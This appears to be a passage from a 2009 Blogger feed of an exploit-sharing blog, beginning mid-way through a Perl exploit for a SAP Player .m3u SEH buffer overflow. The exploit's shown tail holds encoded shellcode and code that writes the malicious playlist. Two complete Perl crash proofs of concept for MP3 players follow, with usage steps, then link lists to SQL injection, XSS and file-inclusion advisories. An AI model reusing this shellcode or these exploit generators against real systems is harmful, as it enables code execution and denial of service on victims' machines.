/&gt;"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x38".&lt;br /&gt;"\x78\x73\x8a\x83\xeb\xfc\xe2\xf4\xc4\x90\x37\x8a\x38\x78\xf8\xcf".&lt;br /&gt;"\x04\xf3\x0f\x8f\x40\x79\x9c\x01\x77\x60\xf8\xd5\x18\x79\x98\xc3".&lt;br /&gt;"\xb3\x4c\xf8\x8b\xd6\x49\xb3\x13\x94\xfc\xb3\xfe\x3f\xb9\xb9\x87".&lt;br /&gt;"\x39\xba\x98\x7e\x03\x2c\x57\x8e\x4d\x9d\xf8\xd5\x1c\x79\x98\xec".&lt;br /&gt;"\xb3\x74\x38\x01\x67\x64\x72\x61\xb3\x64\xf8\x8b\xd3\xf1\x2f\xae".&lt;br /&gt;"\x3c\xbb\x42\x4a\x5c\xf3\x33\xba\xbd\xb8\x0b\x86\xb3\x38\x7f\x01".&lt;br /&gt;"\x48\x64\xde\x01\x50\x70\x98\x83\xb3\xf8\xc3\x8a\x38\x78\xf8\xe2".&lt;br /&gt;"\x04\x27\x42\x7c\x58\x2e\xfa\x72\xbb\xb8\x08\xda\x50\x88\xf9\x8e".&lt;br /&gt;"\x67\x10\xeb\x74\xb2\x76\x24\x75\xdf\x1b\x12\xe6\x5b\x78\x73\x8a";&lt;br /&gt;open(fhandle,'&gt;&gt;expl.m3u');&lt;br /&gt;print fhandle $junk.$nseh.$seh.$nop.$shellcode;&lt;br /&gt;close(fhandle);&lt;br /&gt;print "\n  [+] File created successfully: expl.m3u \n";&lt;br /&gt;&lt;/pre&gt;&lt;pre&gt;&lt;span style="font-size:100%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div style="text-align: left;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_yr6JJbPFj8M/SqApyOcngVI/AAAAAAAAAAU/Vd8s9xxwQ0M/s1600-h/sap-bof.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 256px;" src="http://2.bp.blogspot.com/_yr6JJbPFj8M/SqApyOcngVI/AAAAAAAAAAU/Vd8s9xxwQ0M/s320/sap-bof.JPG" alt="" id="BLOGGER_PHOTO_ID_5377343897928696146" border="0" /&gt;&lt;/a&gt;&lt;a href="http://www.milw0rm.com/exploits/9581"&gt;&lt;br /&gt;http://www.milw0rm.com/exploits/9581&lt;/a&gt;&lt;br /&gt;&lt;a href="http://packetstormsecurity.org/0909-exploits/sapplayer-overflow.txt"&gt;http://packetstormsecurity.org/0909-exploits/sapplayer-overflow.txt&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5335593286401958291-834300111143714934?l=hjafari.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hjafari.blogspot.com/feeds/834300111143714934/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hjafari.blogspot.com/2009/09/sap-player-09-m3u-universal-local-bof.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5335593286401958291/posts/default/834300111143714934'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5335593286401958291/posts/default/834300111143714934'/><link rel='alternate' type='text/html' href='http://hjafari.blogspot.com/2009/09/sap-player-09-m3u-universal-local-bof.html' title='SAP player 0.9 (.m3u) Universal Local BoF Exploit(SEH)'/><author><name>PLATEN</name><uri>http://www.blogger.com/profile/09070483891505018921</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_yr6JJbPFj8M/SqApyOcngVI/AAAAAAAAAAU/Vd8s9xxwQ0M/s72-c/sap-bof.JPG' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5335593286401958291.post-1930239667817841482</id><published>2009-08-25T06:29:00.000-07:00</published><updated>2009-09-08T10:32:56.513-07:00</updated><title type='text'>two music player crash vulnerability</title><content type='html'>hi&lt;br /&gt;Pico MP3 Player 1.0 (.mp3 File) Local File Crash PoC&lt;br /&gt;&lt;a href="http://thaddy.co.uk/picomp3.zip"&gt;http://thaddy.co.uk/picomp3.zip&lt;/a&gt;&lt;br /&gt;&lt;span style="font-family: monospace;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="color: rgb(51, 255, 51);"&gt;#!/usr/bin/perl&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 255, 51);"&gt;# platen.secure [at] gmail.com&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 255, 51);"&gt;# Pico MP3 Player 1.0 (.mp3 File) Local File Crash PoC&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 255, 51);"&gt;my $crash="A" x 2500;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 255, 51);"&gt;open(myfile,'&gt;&gt;poc.mp3');&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 255, 51);"&gt;print myfile $crash;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://packetstormsecurity.org/0908-exploits/pico-dos.txt"&gt;&lt;br /&gt;http://packetstormsecurity.org/0908-exploits/pico-dos.txt&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;#################################################################&lt;br /&gt;&lt;br /&gt;yPlay Player 1.0 (.mp3 ) Local File Crash PoC&lt;br /&gt;&lt;pre&gt;&lt;a href="http://www.spacejock.com/yPlay_Download.html"&gt;http://www.spacejock.com/yPlay_Download.html&lt;/a&gt;&lt;/pre&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 255, 51);"&gt;#!/usr/bin/perl&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 255, 51);"&gt;# platen.secure [at] gmail.com&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 255, 51);"&gt;# yPlay Player 1.0 (.mp3 ) Local File Crash PoC&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 255, 51);"&gt;# http://www.spacejock.com/yPlay_Download.html&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 255, 51);"&gt;my $crash="A" x 2500;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 255, 51);"&gt;open(myfile,'&gt;&gt;poc.mp3');&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 255, 51);"&gt;print myfile $crash;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://packetstormsecurity.org/0908-exploits/yplay-crash.txt"&gt;http://packetstormsecurity.org/0908-exploits/yplay-crash.txt&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="transword"&gt;usage: first save exploite in expl.pl file and then run this command perl expl.pl \ exploite create poc.mp3 file. if you open poc.mp3 file by vulnerability players , player crash!&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5335593286401958291-1930239667817841482?l=hjafari.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hjafari.blogspot.com/feeds/1930239667817841482/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hjafari.blogspot.com/2009/08/two-music-player-crash-vulnerability.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5335593286401958291/posts/default/1930239667817841482'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5335593286401958291/posts/default/1930239667817841482'/><link rel='alternate' type='text/html' href='http://hjafari.blogspot.com/2009/08/two-music-player-crash-vulnerability.html' title='two music player crash vulnerability'/><author><name>PLATEN</name><uri>http://www.blogger.com/profile/09070483891505018921</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5335593286401958291.post-278778537389795345</id><published>2009-08-25T06:26:00.000-07:00</published><updated>2009-08-25T06:28:30.378-07:00</updated><title type='text'>two webapp</title><content type='html'>Xplode CMS (SQL/XSS) Multiple Remote Vuln  &lt;a href="http://packetstormsecurity.org/0904-exploits/xplodecms-sqlxss.txt"&gt;-link-&lt;/a&gt;&lt;br /&gt;Shopmaker CMS 2.0 (bSQL/ LFI) Multiple Remote Vulnerabilities  &lt;a href="http://www.milw0rm.com/exploits/9356"&gt;-link-&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5335593286401958291-278778537389795345?l=hjafari.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hjafari.blogspot.com/feeds/278778537389795345/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hjafari.blogspot.com/2009/08/two-webapp.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5335593286401958291/posts/default/278778537389795345'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5335593286401958291/posts/default/278778537389795345'/><link rel='alternate' type='text/html' href='http://hjafari.blogspot.com/2009/08/two-webapp.html' title='two webapp'/><author><name>PLATEN</name><uri>http://www.blogger.com/profile/09070483891505018921</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5335593286401958291.post-5308666115116519735</id><published>2009-08-25T06:18:00.000-07:00</published><updated>2009-08-25T06:26:11.472-07:00</updated><title type='text'>Some Webapp</title><content type='html'>hello&lt;br /&gt;This webapp vuln is the property before !...&lt;br /&gt;&lt;br /&gt;Arcadwy Games CMS  SQL injection vulnerability  &lt;a href="http://packetstormsecurity.org/0904-exploits/arcadwygames-sql.txt"&gt;-link-&lt;/a&gt;&lt;br /&gt;Akan Portal SQL injection vulnerability  &lt;a href="http://packetstormsecurity.org/0904-exploits/akanportal-sql.txt"&gt;-links-&lt;/a&gt;&lt;br /&gt;Blue Utopia  local file inclusion vulnerability  &lt;a href="http://packetstormsecurity.org/0902-exploits/blueutopia-lfi.txt"&gt;-links-&lt;/a&gt;&lt;br /&gt;Galeri 1  SQL injection vulnerability  &lt;a href="http://packetstormsecurity.org/0905-exploits/galeri-sql.txt"&gt;-links-&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5335593286401958291-5308666115116519735?l=hjafari.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hjafari.blogspot.com/feeds/5308666115116519735/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hjafari.blogspot.com/2009/08/some-webapp.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5335593286401958291/posts/default/5308666115116519735'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5335593286401958291/posts/default/5308666115116519735'/><link rel='alternate' type='text/html' href='http://hjafari.blogspot.com/2009/08/some-webapp.html' title='Some Webapp'/><author><name>PLATEN</name><uri>http://www.blogger.com/profile/09070483891505018921</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5335593286401958291.post-1312324212765390448</id><published>2009-08-25T05:23:00.000-07:00</published><updated>2009-09-08T13:02:56.660-07:00</updated><title type='text'>first post!</title><content type='html'>&lt;div id="result_box" dir="ltr"&gt;Hi!&lt;br /&gt;I created this blog today and this my first post!&lt;br /&gt;&lt;br /&gt;cheer&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5335593286401958291-1312324212765390448?l=hjafari.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hjafari.blogspot.com/feeds/1312324212765390448/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hjafari.blogspot.com/2009/08/hi-i-created-this-blog-today-and-i-blog.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5335593286401958291/posts/default/1312324212765390448'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5335593286401958291/posts/default/1312324212765390448'/><link rel='alternate' type='text/html' href='http://hjafari.blogspot.com/2009/08/hi-i-created-this-blog-today-and-i-blog.html' title='first post!'/><author><name>PLATEN</name><uri>http://www.blogger.com/profile/09070483891505018921</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry></feed>
